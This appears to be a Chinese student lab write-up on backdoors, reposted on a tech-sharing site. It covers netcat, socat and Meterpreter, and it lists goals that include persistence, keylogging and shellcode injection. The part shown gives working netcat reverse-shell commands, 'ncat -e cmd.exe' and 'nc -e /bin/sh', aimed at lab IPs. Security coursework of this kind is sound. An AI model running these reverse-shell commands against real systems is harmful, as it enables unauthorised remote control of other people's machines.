ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

Exp2-后门原理与实践

2022-03-29 14:32:39  阅读:155  来源: 互联网

标签:后门 Shell kali Windows Exp2 实践 获取 主机 ncat


一、常用后门工具

  • ​1.Netcat 、Socat系列
    • 底层工具,进行基本的TCP、UDP数据收发,常常被与其他工具结合使用,起到后门的作用。
      • 在Linux系统中一般自带netcat,使用man nc命令可以查看使用帮助
      • 在Windows系统中,需要下载ncat.rar,解压后可使用
      • SoCat相当于Netcat++,一个超级Netcat工具。在Windows下可以下载socat.rar,使用README作为参考。任何代理、转发等功能都可以用该工具实现
  • 2.Meterpreter
    • 一个用来生成后门程序的程序。
      它包含着后门的
      • 基本功能(基本的连接、执行指令)
      • 扩展功能(如搜集用户信息、安装服务等功能)
      • 编码模式
      • 运行平台
      • 运行参数
  • 3.Intersect
  • ​4.CHAOS……
    ​本次实验我们主要使用Netcat 、Socat系列以及Meterpreter。

二、实验目标

  • 使用netcat获取主机操作Shell,cron启动
  • 使用socat获取主机操作Shell,任务计划启动
  • 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
  • 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
  • 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

三、实验环境

环境
主机:Windows 10;
靶机:Kali ;

四、实验内容

1.使用netcat获取主机操作Shell,cron启动

  • kali获取windows的shell
    • (1) 查看kali虚拟机的IP地址

    • (2)在kali虚拟机中开启监听,端口号以学号为基础指定
      nc -l -p 1301

    • (3)windows反弹连接Linux,这里首先在windows下进入ncat所在的文件夹,ip的地址为Linux的地址
      ncat.exe -e cmd.exe 192.168.116.132 1301

    • (4)Linux下看到Windows的命令提示,验证shell

  • 2.Windows获取kali虚拟机的shell
    • (1)获取Windows中的IP地址

    • (2)在ncat文件夹目录下打开监听,端口选择类学号数字
      ncat.exe -l -p 1301

    • (3)Linux反弹连接windows
      nc 192.168.101.99 1301 -e /bin/sh

    • (4)Windows获得kali的shell,使用linux常用指令验证

标签:后门,Shell,kali,Windows,Exp2,实践,获取,主机,ncat
来源: https://www.cnblogs.com/20191301lhq/p/16071588.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有